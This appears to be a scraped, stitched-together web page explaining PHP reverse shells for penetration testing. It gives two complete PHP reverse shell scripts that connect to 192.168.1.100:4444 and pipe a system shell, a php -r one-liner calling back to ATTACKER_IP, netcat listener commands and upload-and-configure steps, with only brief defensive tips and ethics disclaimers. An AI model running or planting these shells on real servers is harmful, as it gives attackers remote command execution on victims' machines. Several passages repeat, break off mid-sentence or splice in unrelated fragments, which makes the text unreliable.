Reverse Shell Php -
Here is a simplified, annotated version. The most famous public example is the php-reverse-shell.php from PentestMonkey (now maintained in the laudanum project).
<?php // Set the attacker's IP address and listening port $ip = '192.168.1.100'; // CHANGE THIS $port = 4444; // CHANGE THIS// Create a TCP socket $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) // Failed to connect echo "Error: $errstr ($errno)"; exit(1);
// Redirect STDIN, STDOUT, STDERR to our socket // This allows the shell to read input from the attacker and send output back fwrite($sock, "Connected! Type commands:\n"); while (!feof($sock)) // Send a prompt fwrite($sock, "shell> ");
// Read command from attacker $cmd = fgets($sock, 1024); if (trim($cmd) == "exit") break; // Execute command and capture output $output = shell_exec($cmd . " 2>&1"); // 2>&1 includes stderr // Send output back to attacker fwrite($sock, $output);
fclose($sock); ?>
A PHP reverse shell is a powerful technique, but it relies on two weaknesses:
Eliminate either one, and the attack fails. Defense in depth means patching both: restrict file uploads/execution AND block unexpected outbound connections.
Stay safe, get permission, and always hack ethically.
A PHP reverse shell is a script that, when executed on a target web server, initiates an outbound connection back to your machine, providing a command-line interface to the server. This technique is commonly used during penetration testing to gain interactive access after discovering a file upload or code execution vulnerability. 1. Obtain a Reverse Shell Script
The most reliable way to establish a connection is to use an established, pre-written script. Reverse Shell Php
Pentest Monkey PHP Reverse Shell: Widely considered the industry standard for PHP web shells. It provides a full interactive shell that supports interactive programs like ssh or su.
You can download it from the Pentest Monkey GitHub repository.
Kali Linux Local Copy: If you are using Kali Linux, a copy is already available at /usr/share/webshells/php/php-reverse-shell.php.
MSFVenom: You can generate a custom payload using Metasploit with the following command:msfvenom -p php/meterpreter_reverse_tcp LHOST= 2. Configure the Script
Before uploading, you must edit the script to point back to your machine. Open the .php file in a text editor like nano. Locate the $ip and $port variables.
Change $ip to your attacking machine's IP address (use your VPN IP if on a platform like Hack The Box).
Set $port to any open port on your machine (e.g., 4444 or 1234). 3. Start a Listener
On your attacking machine, you must set up a listener to "catch" the incoming connection. RootMe (CTF Walkthrough). A TryHackMe Lab | by Marduk I Am
A PHP reverse shell is a type of malicious script or legitimate administrative tool where a target server initiates an outbound connection to an attacker's machine, providing interactive command-line access. Unlike traditional "bind shells," which open a port and wait for a connection, reverse shells are highly effective at bypassing firewalls and Network Address Translation (NAT) because they appear as legitimate outbound traffic. What is a PHP Reverse Shell?
A PHP reverse shell exploits the fact that many web servers have the PHP interpreter installed and allow it to execute system-level commands. By executing a PHP script—often through a vulnerability like unrestricted file upload or remote code execution (RCE)—an attacker can force the server to "call back" to their own computer. Here is a simplified, annotated version
Bypassing Firewalls: Most firewalls are configured to block incoming connections but allow outgoing ones (e.g., for updates or web browsing). A reverse shell takes advantage of this "inside-out" vulnerability.
Interactive Control: Once the connection is established, the attacker can issue real-time shell commands, navigate the file system, and escalate privileges. Common PHP Reverse Shell Payloads
Attackers use various methods to establish these connections, ranging from simple one-liners to complex scripts. 1. PHP One-Liner (Command Line)
If an attacker has the ability to run a single command on the target, they might use a one-liner that utilizes fsockopen to create a TCP connection:php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Creating a PHP reverse shell involves two main components: a listener on your machine to catch the connection and a payload uploaded to the target server to initiate it. 1. Set Up the Listener
Before executing the PHP code, you must have a listener waiting for the incoming connection. Netcat is the standard tool for this. Run this command on your local machine:
Open a terminal on your Kali Linux or any Linux machine:
nc -lvnp 4444
For a more stable shell (with tab completion and history), use:
rlwrap nc -lvnp 4444
A reverse shell is a type of shell where the target machine (victim) initiates a connection back to the attacker’s machine. This is opposite to a "bind shell" (where the victim listens for incoming connections).
Why reverse shells?
Look for HTTP requests containing base64-encoded payloads or long strings with fsockopen, stream_socket_client, etc.
The PHP reverse shell is a perfect microcosm of the cybersecurity arms race. For every defensive measure—disabling exec, filtering egress traffic, scanning files—attackers invent a new evasion: polymorphic code, encrypted tunnels, or leveraging mail() to pop a shell.
As a defender, your goal is not absolute perfection (it doesn’t exist) but defense in depth. Combine:
As an ethical hacker, always remember the immense responsibility that comes with wielding these techniques. A PHP reverse shell is a skeleton key to a server’s soul. Use it only to illuminate the locks, never to pick them without permission.
<?php set_time_limit(0); $ip = '192.168.1.100'; $port = 4444;$sock = @fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) die("No connection: $errstr ($errno)");
// Spawn a shell process $descriptorspec = array( 0 => array("pipe", "r"), // stdin 1 => array("pipe", "w"), // stdout 2 => array("pipe", "w") // stderr );
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
if (is_resource($process)) // Forward socket <-> shell bidirectionally stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0);
while (true) // Read from socket -> send to shell stdin $socket_read = fread($sock, 1024); if ($socket_read) fwrite($pipes[0], $socket_read); // Read from shell stdout -> send to socket $stdout_read = fread($pipes[1], 1024); if ($stdout_read) fwrite($sock, $stdout_read); // Read from shell stderr -> send to socket $stderr_read = fread($pipes[2], 1024); if ($stderr_read) fwrite($sock, $stderr_read); // Check if socket is dead if (feof($sock)) break; fclose($sock); proc_close($process);
?>
